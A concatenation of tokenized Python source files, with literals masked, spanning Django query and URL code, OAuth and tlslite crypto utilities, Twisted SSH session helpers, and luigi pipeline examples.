<EOL> lhs = qn ( name ) <EOL> return connection . ops . field_cast_sql ( db_type ) % lhs <EOL> def relabel_aliases ( self , change_map , node = None ) : <EOL> """<STR_LIT>""" <EOL> if not node : <EOL> node = self <EOL> for pos , child in enumerate ( node . children ) : <EOL> if hasattr ( child , '<STR_LIT>' ) : <EOL> child . relabel_aliases ( change_map ) <EOL> elif isinstance ( child , tree . Node ) : <EOL> self . relabel_aliases ( change_map , child ) <EOL> elif isinstance ( child , ( list , tuple ) ) : <EOL> if isinstance ( child [ <NUM_LIT:0> ] , ( list , tuple ) ) : <EOL> elt = list ( child [ <NUM_LIT:0> ] ) <EOL> if elt [ <NUM_LIT:0> ] in change_map : <EOL> elt [ <NUM_LIT:0> ] = change_map [ elt [ <NUM_LIT:0> ] ] <EOL> node . children [ pos ] = ( tuple ( elt ) , ) + child [ <NUM_LIT:1> : ] <EOL> else : <EOL> child [ <NUM_LIT:0> ] . relabel_aliases ( change_map ) <EOL> if hasattr ( child [ <NUM_LIT:3> ] , '<STR_LIT>' ) : <EOL> child [ <NUM_LIT:3> ] . relabel_aliases ( change_map ) <EOL> class EverythingNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def as_sql ( self , qn = None , connection = None ) : <EOL> return '<STR_LIT>' , [ ] <EOL> def relabel_aliases ( self , change_map , node = None ) : <EOL> return <EOL> class NothingNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def as_sql ( self , qn = None , connection = None ) : <EOL> raise EmptyResultSet <EOL> def relabel_aliases ( self , change_map , node = None ) : <EOL> return <EOL> class ExtraWhere ( object ) : <EOL> def __init__ ( self , sqls , params ) : <EOL> self . sqls = sqls <EOL> self . params = params <EOL> def as_sql ( self , qn = None , connection = None ) : <EOL> sqls = [ "<STR_LIT>" % sql for sql in self . sqls ] <EOL> return "<STR_LIT>" . join ( sqls ) , tuple ( self . params or ( ) ) <EOL> class Constraint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , alias , col , field ) : <EOL> self . alias , self . col , self . field = alias , col , field <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_dict = self . __dict__ . copy ( ) <EOL> if self . field : <EOL> obj_dict [ '<STR_LIT>' ] = self . field . model <EOL> obj_dict [ '<STR_LIT>' ] = self . field . name <EOL> del obj_dict [ '<STR_LIT>' ] <EOL> return obj_dict <EOL> def __setstate__ ( self , data ) : <EOL> """<STR_LIT>""" <EOL> model = data . pop ( '<STR_LIT>' , None ) <EOL> field_name = data . pop ( '<STR_LIT>' , None ) <EOL> self . __dict__ . update ( data ) <EOL> if model is not None : <EOL> self . field = model . _meta . get_field ( field_name ) <EOL> else : <EOL> self . field = None <EOL> def prepare ( self , lookup_type , value ) : <EOL> if self . field : <EOL> return self . field . get_prep_lookup ( lookup_type , value ) <EOL> return value <EOL> def process ( self , lookup_type , value , connection ) : <EOL> """<STR_LIT>""" <EOL> from django . db . models . base import ObjectDoesNotExist <EOL> try : <EOL> if self . field : <EOL> params = self . field . get_db_prep_lookup ( lookup_type , value , <EOL> connection = connection , prepared = True ) <EOL> db_type = self . field . db_type ( connection = connection ) <EOL> else : <EOL> params = Field ( ) . get_db_prep_lookup ( lookup_type , value , <EOL> connection = connection , prepared = True ) <EOL> db_type = None <EOL> except ObjectDoesNotExist : <EOL> raise EmptyShortCircuit <EOL> return ( self . alias , self . col , db_type ) , params <EOL> def relabel_aliases ( self , change_map ) : <EOL> if self . alias in change_map : <EOL> self . alias = change_map [ self . alias ] </s>
<s> from . mbcharsetprober import MultiByteCharSetProber <EOL> from . codingstatemachine import CodingStateMachine <EOL> from . chardistribution import Big5DistributionAnalysis <EOL> from . mbcssm import Big5SMModel <EOL> class Big5Prober ( MultiByteCharSetProber ) : <EOL> def __init__ ( self ) : <EOL> MultiByteCharSetProber . __init__ ( self ) <EOL> self . _mCodingSM = CodingStateMachine ( Big5SMModel ) <EOL> self . _mDistributionAnalyzer = Big5DistributionAnalysis ( ) <EOL> self . reset ( ) <EOL> def get_charset_name ( self ) : <EOL> return "<STR_LIT>" </s>
<s> from __future__ import absolute_import <EOL> """<STR_LIT>""" <EOL> import random <EOL> import re <EOL> import string <EOL> import time <EOL> import urllib <EOL> import urlparse <EOL> UNICODE_ASCII_CHARACTER_SET = ( string . ascii_letters . decode ( '<STR_LIT:ascii>' ) + <EOL> string . digits . decode ( '<STR_LIT:ascii>' ) ) <EOL> always_safe = ( u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' u'<STR_LIT>' ) <EOL> def quote ( s , safe = u'<STR_LIT:/>' ) : <EOL> encoded = s . encode ( "<STR_LIT:utf-8>" ) <EOL> quoted = urllib . quote ( encoded , safe ) <EOL> return quoted . decode ( "<STR_LIT:utf-8>" ) <EOL> def unquote ( s ) : <EOL> encoded = s . encode ( "<STR_LIT:utf-8>" ) <EOL> unquoted = urllib . unquote ( encoded ) <EOL> return unquoted . decode ( "<STR_LIT:utf-8>" ) <EOL> def urlencode ( params ) : <EOL> utf8_params = encode_params_utf8 ( params ) <EOL> urlencoded = urllib . urlencode ( utf8_params ) <EOL> return urlencoded . decode ( "<STR_LIT:utf-8>" ) <EOL> def encode_params_utf8 ( params ) : <EOL> """<STR_LIT>""" <EOL> encoded = [ ] <EOL> for k , v in params : <EOL> encoded . append ( ( <EOL> k . encode ( '<STR_LIT:utf-8>' ) if isinstance ( k , unicode ) else k , <EOL> v . encode ( '<STR_LIT:utf-8>' ) if isinstance ( v , unicode ) else v ) ) <EOL> return encoded <EOL> def decode_params_utf8 ( params ) : <EOL> """<STR_LIT>""" <EOL> decoded = [ ] <EOL> for k , v in params : <EOL> decoded . append ( ( <EOL> k . decode ( '<STR_LIT:utf-8>' ) if isinstance ( k , str ) else k , <EOL> v . decode ( '<STR_LIT:utf-8>' ) if isinstance ( v , str ) else v ) ) <EOL> return decoded <EOL> urlencoded = set ( always_safe ) | set ( u'<STR_LIT>' ) <EOL> def urldecode ( query ) : <EOL> """<STR_LIT>""" <EOL> if query and not set ( query ) <= urlencoded : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> invalid_hex = u'<STR_LIT>' <EOL> if len ( re . findall ( invalid_hex , query ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> query = query . decode ( '<STR_LIT:utf-8>' ) if isinstance ( query , str ) else query <EOL> params = urlparse . parse_qsl ( query , keep_blank_values = True ) <EOL> return decode_params_utf8 ( params ) <EOL> def extract_params ( raw ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( raw , basestring ) : <EOL> try : <EOL> params = urldecode ( raw ) <EOL> except ValueError : <EOL> params = None <EOL> elif hasattr ( raw , '<STR_LIT>' ) : <EOL> try : <EOL> dict ( raw ) <EOL> except ValueError : <EOL> params = None <EOL> except TypeError : <EOL> params = None <EOL> else : <EOL> params = list ( raw . items ( ) if isinstance ( raw , dict ) else raw ) <EOL> params = decode_params_utf8 ( params ) <EOL> else : <EOL> params = None <EOL> return params <EOL> def generate_nonce ( ) : <EOL> """<STR_LIT>""" <EOL> return unicode ( unicode ( random . getrandbits ( <NUM_LIT:64> ) ) + generate_timestamp ( ) ) <EOL> def generate_timestamp ( ) : <EOL> """<STR_LIT>""" <EOL> return unicode ( int ( time . time ( ) ) ) <EOL> def generate_token ( length = <NUM_LIT:30> , chars = UNICODE_ASCII_CHARACTER_SET ) : <EOL> """<STR_LIT>""" <EOL> rand = random . SystemRandom ( ) <EOL> return u'<STR_LIT>' . join ( rand . choice ( chars ) for x in range ( length ) ) <EOL> def add_params_to_qs ( query , params ) : <EOL> """<STR_LIT>""" <EOL> queryparams = urlparse . parse_qsl ( query , keep_blank_values = True ) <EOL> queryparams . extend ( params ) <EOL> return urlencode ( queryparams ) <EOL> def add_params_to_uri ( uri , params ) : <EOL> """<STR_LIT>""" <EOL> sch , net , path , par , query , fra = urlparse . urlparse ( uri ) <EOL> query = add_params_to_qs ( query , params ) <EOL> return urlparse . urlunparse ( ( sch , net , path , par , query , fra ) ) <EOL> def safe_string_equals ( a , b ) : <EOL> """<STR_LIT>""" <EOL> if len ( a ) != len ( b ) : <EOL> return False <EOL> result = <NUM_LIT:0> <EOL> for x , y in zip ( a , b ) : <EOL> result |= ord ( x ) ^ ord ( y ) <EOL> return result == <NUM_LIT:0> <EOL> class Request ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , uri , http_method = u'<STR_LIT:GET>' , body = None , headers = None ) : <EOL> self . uri = uri <EOL> self . http_method = http_method <EOL> self . headers = headers or { } <EOL> self . body = body <EOL> self . decoded_body = extract_params ( body ) <EOL> self . oauth_params = [ ] <EOL> @ property <EOL> def uri_query ( self ) : <EOL> return urlparse . urlparse ( self . uri ) . query <EOL> @ property <EOL> def uri_query_params ( self ) : <EOL> return urlparse . parse_qsl ( self . uri_query , keep_blank_values = True , <EOL> strict_parsing = True ) </s>
<s> """<STR_LIT>""" <EOL> import anydbm <EOL> import thread <EOL> class BaseDB : <EOL> def __init__ ( self , filename , type ) : <EOL> self . type = type <EOL> self . filename = filename <EOL> if self . filename : <EOL> self . db = None <EOL> else : <EOL> self . db = { } <EOL> self . lock = thread . allocate_lock ( ) <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . filename : <EOL> self . db = anydbm . open ( self . filename , "<STR_LIT:n>" ) <EOL> self . db [ "<STR_LIT>" ] = self . type <EOL> self . db . sync ( ) <EOL> else : <EOL> self . db = { } <EOL> def open ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . filename : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . db = anydbm . open ( self . filename , "<STR_LIT:w>" ) <EOL> try : <EOL> if self . db [ "<STR_LIT>" ] != self . type : <EOL> raise ValueError ( "<STR_LIT>" % self . type ) <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def __getitem__ ( self , username ) : <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> valueStr = self . db [ username ] <EOL> finally : <EOL> self . lock . release ( ) <EOL> return self . _getItem ( username , valueStr ) <EOL> def __setitem__ ( self , username , value ) : <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> valueStr = self . _setItem ( username , value ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> self . db [ username ] = valueStr <EOL> if self . filename : <EOL> self . db . sync ( ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> def __delitem__ ( self , username ) : <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> del ( self . db [ username ] ) <EOL> if self . filename : <EOL> self . db . sync ( ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> def __contains__ ( self , username ) : <EOL> """<STR_LIT>""" <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> return self . db . has_key ( username ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> def check ( self , username , param ) : <EOL> value = self . __getitem__ ( username ) <EOL> return self . _checkItem ( value , username , param ) <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> usernames = self . db . keys ( ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> usernames = [ u for u in usernames if not u . startswith ( "<STR_LIT>" ) ] <EOL> return usernames </s>
<s> """<STR_LIT>""" <EOL> from . cryptomath import * <EOL> from . aes import * <EOL> if m2cryptoLoaded : <EOL> def new ( key , mode , IV ) : <EOL> return OpenSSL_AES ( key , mode , IV ) <EOL> class OpenSSL_AES ( AES ) : <EOL> def __init__ ( self , key , mode , IV ) : <EOL> AES . __init__ ( self , key , mode , IV , "<STR_LIT>" ) <EOL> self . key = key <EOL> self . IV = IV <EOL> def _createContext ( self , encrypt ) : <EOL> context = m2 . cipher_ctx_new ( ) <EOL> if len ( self . key ) == <NUM_LIT:16> : <EOL> cipherType = m2 . aes_128_cbc ( ) <EOL> if len ( self . key ) == <NUM_LIT> : <EOL> cipherType = m2 . aes_192_cbc ( ) <EOL> if len ( self . key ) == <NUM_LIT:32> : <EOL> cipherType = m2 . aes_256_cbc ( ) <EOL> m2 . cipher_init ( context , cipherType , self . key , self . IV , encrypt ) <EOL> return context <EOL> def encrypt ( self , plaintext ) : <EOL> AES . encrypt ( self , plaintext ) <EOL> context = self . _createContext ( <NUM_LIT:1> ) <EOL> ciphertext = m2 . cipher_update ( context , plaintext ) <EOL> m2 . cipher_ctx_free ( context ) <EOL> self . IV = ciphertext [ - self . block_size : ] <EOL> return ciphertext <EOL> def decrypt ( self , ciphertext ) : <EOL> AES . decrypt ( self , ciphertext ) <EOL> context = self . _createContext ( <NUM_LIT:0> ) <EOL> plaintext = m2 . cipher_update ( context , ciphertext + ( '<STR_LIT>' * <NUM_LIT:16> ) ) <EOL> plaintext = plaintext [ : len ( ciphertext ) ] <EOL> m2 . cipher_ctx_free ( context ) <EOL> self . IV = ciphertext [ - self . block_size : ] <EOL> return plaintext </s>
<s> import hashlib <EOL> import base64 <EOL> try : <EOL> from tlslite . utils import cipherfactory <EOL> use_aes = True <EOL> except : <EOL> use_aes = False <EOL> BLOCK_SIZE = <NUM_LIT:16> <EOL> class _SimplerAES ( object ) : <EOL> def __init__ ( self , key ) : <EOL> self . _rawkey = key <EOL> def pad ( self , data ) : <EOL> pad = BLOCK_SIZE - len ( data ) % BLOCK_SIZE <EOL> return data + pad * chr ( pad ) <EOL> def unpad ( self , padded ) : <EOL> pad = ord ( padded [ - <NUM_LIT:1> ] ) <EOL> return padded [ : - pad ] <EOL> def encrypt ( self , data ) : <EOL> password = self . _rawkey <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password ) <EOL> key = m . hexdigest ( ) [ : <NUM_LIT:32> ] <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password + key ) <EOL> iv = m . hexdigest ( ) <EOL> data = self . pad ( data ) <EOL> aes = cipherfactory . createAES ( key , iv [ : <NUM_LIT:16> ] ) <EOL> encrypted = str ( aes . encrypt ( data ) ) <EOL> return base64 . urlsafe_b64encode ( encrypted ) <EOL> def decrypt ( self , edata ) : <EOL> password = self . _rawkey <EOL> edata = base64 . urlsafe_b64decode ( str ( edata ) ) <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password ) <EOL> key = m . hexdigest ( ) [ : <NUM_LIT:32> ] <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password + key ) <EOL> iv = m . hexdigest ( ) <EOL> aes = cipherfactory . createAES ( key , iv [ : <NUM_LIT:16> ] ) <EOL> return self . unpad ( str ( aes . decrypt ( edata ) ) ) <EOL> class NoAES ( object ) : <EOL> def __init__ ( self , key ) : <EOL> pass <EOL> def pad ( self , data ) : <EOL> pass <EOL> def unpad ( self , padded ) : <EOL> pass <EOL> def encrypt ( self , data ) : <EOL> return base64 . urlsafe_b64encode ( "<STR_LIT>" % ( "<STR_LIT>" , data ) ) <EOL> def decrypt ( self , edata ) : <EOL> edata = base64 . urlsafe_b64decode ( edata ) <EOL> return str ( edata ) [ len ( "<STR_LIT>" ) : ] <EOL> SimplerAES = _SimplerAES if use_aes else NoAES <EOL> __all__ = [ '<STR_LIT>' ] </s>
<s> from django . contrib . staticfiles . urls import staticfiles_urlpatterns <EOL> from django . conf . urls import patterns , include , url <EOL> from django . core . urlresolvers import reverse , RegexURLPattern <EOL> from django . conf import settings <EOL> from django . conf . urls . i18n import i18n_patterns <EOL> from django . utils import importlib <EOL> import sys <EOL> from django . http import HttpResponseRedirect <EOL> import logging <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def redirect_to_default_app ( request ) : <EOL> home = "<STR_LIT>" % settings . DEFAULT_APP <EOL> reversed = "<STR_LIT>" % settings . DEFAULT_APP <EOL> try : <EOL> reversed = reverse ( home ) <EOL> except Exception , e : <EOL> logger . exception ( e ) <EOL> pass <EOL> return HttpResponseRedirect ( reversed ) <EOL> def redirect_to_home ( app ) : <EOL> def redirect_internal ( request ) : <EOL> home = "<STR_LIT>" % app <EOL> reversed = "<STR_LIT>" % app <EOL> try : <EOL> reversed = reverse ( home ) <EOL> except Exception , e : <EOL> logger . exception ( e ) <EOL> pass <EOL> return HttpResponseRedirect ( reversed ) <EOL> return redirect_internal <EOL> handler404 = '<STR_LIT>' <EOL> handler500 = '<STR_LIT>' <EOL> urlpatterns = i18n_patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , redirect_to_default_app , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) <EOL> for app in settings . USER_APPS : <EOL> app_prefix = r'<STR_LIT>' % app <EOL> urls = None <EOL> try : <EOL> app_urls_module = "<STR_LIT>" % app <EOL> app_urls = importlib . import_module ( app_urls_module ) <EOL> urls = app_urls . urlpatterns <EOL> except Exception , e : <EOL> app_module = importlib . import_module ( app ) <EOL> if hasattr ( app_module , '<STR_LIT>' ) : <EOL> urls = app_module . urlpatterns <EOL> else : <EOL> logger . debug ( "<STR_LIT>" % app ) <EOL> logger . exception ( e ) ; <EOL> if urls : <EOL> has_home = len ( filter ( lambda url : url . name is '<STR_LIT>' , urls ) ) <EOL> if not has_home : <EOL> first_url = urls [ <NUM_LIT:0> ] <EOL> home_url = RegexURLPattern ( <EOL> first_url . regex . pattern , <EOL> first_url . callback , <EOL> first_url . default_args , <EOL> '<STR_LIT>' <EOL> ) <EOL> urls . insert ( <NUM_LIT:0> , home_url ) <EOL> urls . append ( url ( r'<STR_LIT>' , redirect_to_home ( app ) ) ) <EOL> urls += ( <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) <EOL> urlpatterns += i18n_patterns ( '<STR_LIT>' , <EOL> ( app_prefix , include ( urls , namespace = app , app_name = app ) ) <EOL> ) <EOL> from splunkdj . utility import jsurls , config <EOL> jsurls . create_javascript_urlpatterns ( ) <EOL> config . create_config ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . GenericIPAddressField ( null = True , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT> , blank = True ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT> , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from twisted . internet import defer <EOL> from twisted . conch . ssh import common <EOL> from twisted . conch . ssh . channel import SSHChannel <EOL> from twisted . internet . protocol import connectionDone <EOL> from twisted . conch . ssh . session import packRequest_pty_req <EOL> def connectExec ( connection , protocol , commandLine ) : <EOL> """<STR_LIT>""" <EOL> deferred = connectSession ( connection , protocol ) <EOL> @ deferred . addCallback <EOL> def requestSubsystem ( session ) : <EOL> return session . requestExec ( commandLine ) <EOL> return deferred <EOL> def connectShell ( connection , protocol ) : <EOL> """<STR_LIT>""" <EOL> deferred = connectSession ( connection , protocol ) <EOL> @ deferred . addCallback <EOL> def requestSubsystem ( session ) : <EOL> return session . requestShell ( ) <EOL> return deferred <EOL> def connectSubsystem ( connection , protocol , subsystem ) : <EOL> """<STR_LIT>""" <EOL> deferred = connectSession ( connection , protocol ) <EOL> @ deferred . addCallback <EOL> def requestSubsystem ( session ) : <EOL> return session . requestSubsystem ( subsystem ) <EOL> return deferred <EOL> def connectSession ( connection , protocol , sessionFactory = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> factory = sessionFactory or defaultSessionFactory <EOL> session = factory ( * args , ** kwargs ) <EOL> session . dataReceived = protocol . dataReceived <EOL> session . closed = lambda : protocol . connectionLost ( connectionDone ) <EOL> deferred = defer . Deferred ( ) <EOL> @ deferred . addCallback <EOL> def connectProtocolAndReturnSession ( specificData ) : <EOL> protocol . makeConnection ( session ) <EOL> return session <EOL> session . sessionOpen = deferred . callback <EOL> session . openFailed = deferred . errback <EOL> connection . openChannel ( session ) <EOL> return deferred <EOL> def defaultSessionFactory ( env = { } , usePTY = False , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return SSHSession ( env , usePTY , * args , ** kwargs ) <EOL> class SSHSession ( SSHChannel ) : <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self , env , usePTY , * args , ** kwargs ) : <EOL> SSHChannel . __init__ ( self , * args , ** kwargs ) <EOL> self . env = env <EOL> self . usePTY = usePTY <EOL> def sessionOpen ( self , specificData ) : <EOL> """<STR_LIT>""" <EOL> def channelOpen ( self , specificData ) : <EOL> self . requestEnv ( self . env ) <EOL> if self . usePTY : <EOL> self . requestPty ( ) <EOL> self . sessionOpen ( specificData ) <EOL> def requestShell ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . sendRequest ( '<STR_LIT>' , data = '<STR_LIT>' , wantReply = True ) <EOL> def requestExec ( self , commandLine ) : <EOL> """<STR_LIT>""" <EOL> data = common . NS ( commandLine ) <EOL> return self . sendRequest ( '<STR_LIT>' , data , wantReply = True ) <EOL> def requestSubsystem ( self , subsystem ) : <EOL> """<STR_LIT>""" <EOL> data = common . NS ( subsystem ) <EOL> return self . sendRequest ( '<STR_LIT>' , data , wantReply = True ) <EOL> def requestPty ( self , term = None , rows = <NUM_LIT:0> , cols = <NUM_LIT:0> , xpixel = <NUM_LIT:0> , ypixel = <NUM_LIT:0> , modes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> term = term or os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data = packRequest_pty_req ( term , ( rows , cols , xpixel , ypixel ) , modes ) <EOL> return self . sendRequest ( '<STR_LIT>' , data ) <EOL> def requestEnv ( self , env = { } ) : <EOL> """<STR_LIT>""" <EOL> for variable , value in env . iteritems ( ) : <EOL> data = common . NS ( variable ) + common . NS ( value ) <EOL> self . sendRequest ( '<STR_LIT>' , data ) <EOL> def sendRequest ( self , requestType , data , wantReply = False ) : <EOL> assert self . conn , "<STR_LIT>" <EOL> return self . conn . sendRequest ( self , requestType , data , wantReply ) </s>
<s> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' ] <EOL> ) </s>
<s> import random <EOL> from collections import defaultdict <EOL> from heapq import nlargest <EOL> from luigi import six <EOL> import luigi <EOL> import luigi . contrib . hadoop <EOL> import luigi . contrib . hdfs <EOL> import luigi . postgres <EOL> class ExternalStreams ( luigi . ExternalTask ) : <EOL> """<STR_LIT>""" <EOL> date = luigi . DateParameter ( ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . contrib . hdfs . HdfsTarget ( self . date . strftime ( '<STR_LIT>' ) ) <EOL> class Streams ( luigi . Task ) : <EOL> """<STR_LIT>""" <EOL> date = luigi . DateParameter ( ) <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . output ( ) . open ( '<STR_LIT:w>' ) as output : <EOL> for _ in range ( <NUM_LIT:1000> ) : <EOL> output . write ( '<STR_LIT>' . format ( <EOL> random . randint ( <NUM_LIT:0> , <NUM_LIT> ) , <EOL> random . randint ( <NUM_LIT:0> , <NUM_LIT> ) , <EOL> random . randint ( <NUM_LIT:0> , <NUM_LIT> ) ) ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . LocalTarget ( self . date . strftime ( '<STR_LIT>' ) ) <EOL> class StreamsHdfs ( Streams ) : <EOL> """<STR_LIT>""" <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . contrib . hdfs . HdfsTarget ( self . date . strftime ( '<STR_LIT>' ) ) <EOL> class AggregateArtists ( luigi . Task ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . LocalTarget ( "<STR_LIT>" . format ( self . date_interval ) ) <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Streams ( date ) for date in self . date_interval ] <EOL> def run ( self ) : <EOL> artist_count = defaultdict ( int ) <EOL> for t in self . input ( ) : <EOL> with t . open ( '<STR_LIT:r>' ) as in_file : <EOL> for line in in_file : <EOL> _ , artist , track = line . strip ( ) . split ( ) <EOL> artist_count [ artist ] += <NUM_LIT:1> <EOL> with self . output ( ) . open ( '<STR_LIT:w>' ) as out_file : <EOL> for artist , count in six . iteritems ( artist_count ) : <EOL> out_file . write ( '<STR_LIT>' . format ( artist , count ) ) <EOL> class AggregateArtistsHadoop ( luigi . contrib . hadoop . JobTask ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . contrib . hdfs . HdfsTarget ( <EOL> "<STR_LIT>" % self . date_interval , <EOL> format = luigi . contrib . hdfs . PlainDir <EOL> ) <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ StreamsHdfs ( date ) for date in self . date_interval ] <EOL> def mapper ( self , line ) : <EOL> """<STR_LIT>""" <EOL> _ , artist , _ = line . strip ( ) . split ( ) <EOL> yield artist , <NUM_LIT:1> <EOL> def reducer ( self , key , values ) : <EOL> """<STR_LIT>""" <EOL> yield key , sum ( values ) <EOL> class Top10Artists ( luigi . Task ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> use_hadoop = luigi . BoolParameter ( ) <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . use_hadoop : <EOL> return AggregateArtistsHadoop ( self . date_interval ) <EOL> else : <EOL> return AggregateArtists ( self . date_interval ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . LocalTarget ( "<STR_LIT>" % self . date_interval ) <EOL> def run ( self ) : <EOL> top_10 = nlargest ( <NUM_LIT:10> , self . _input_iterator ( ) ) <EOL> with self . output ( ) . open ( '<STR_LIT:w>' ) as out_file : <EOL> for streams , artist in top_10 : <EOL> out_line = '<STR_LIT:\t>' . join ( [ <EOL> str ( self . date_interval . date_a ) , <EOL> str ( self . date_interval . date_b ) , <EOL> artist , <EOL> str ( streams ) <EOL> ] ) <EOL> out_file . write ( ( out_line + '<STR_LIT:\n>' ) ) <EOL> def _input_iterator ( self ) : <EOL> with self . input ( ) . open ( '<STR_LIT:r>' ) as in_file : <EOL> for line in in_file : <EOL> artist , streams = line . strip ( ) . split ( ) <EOL> yield int ( streams ) , artist <EOL> class ArtistToplistToDatabase ( luigi . postgres . CopyToTable ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> use_hadoop = luigi . BoolParameter ( ) <EOL> host = "<STR_LIT:localhost>" <EOL> database = "<STR_LIT>" <EOL> user = "<STR_LIT>" <EOL> password = "<STR_LIT>" <EOL> table = "<STR_LIT>" <EOL> columns = [ ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> return Top10Artists ( self . date_interval , self . use_hadoop ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> luigi . run ( ) </s>
<s> import abc <EOL> import logging <EOL> import operator <EOL> import os <EOL> import subprocess <EOL> import tempfile <EOL> import warnings <EOL> from luigi import six <EOL> import luigi <EOL> import luigi . contrib . hadoop <EOL> from luigi . target import FileAlreadyExists , FileSystemTarget <EOL> from luigi . task import flatten <EOL> if six . PY3 : <EOL> unicode = str <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class HiveCommandError ( RuntimeError ) : <EOL> def __init__ ( self , message , out = None , err = None ) : <EOL> super ( HiveCommandError , self ) . __init__ ( message , out , err ) <EOL> self . message = message <EOL> self . out = out <EOL> self . err = err <EOL> def load_hive_cmd ( ) : <EOL> return luigi . configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+0020>' ) <EOL> def get_hive_syntax ( ) : <EOL> return luigi . 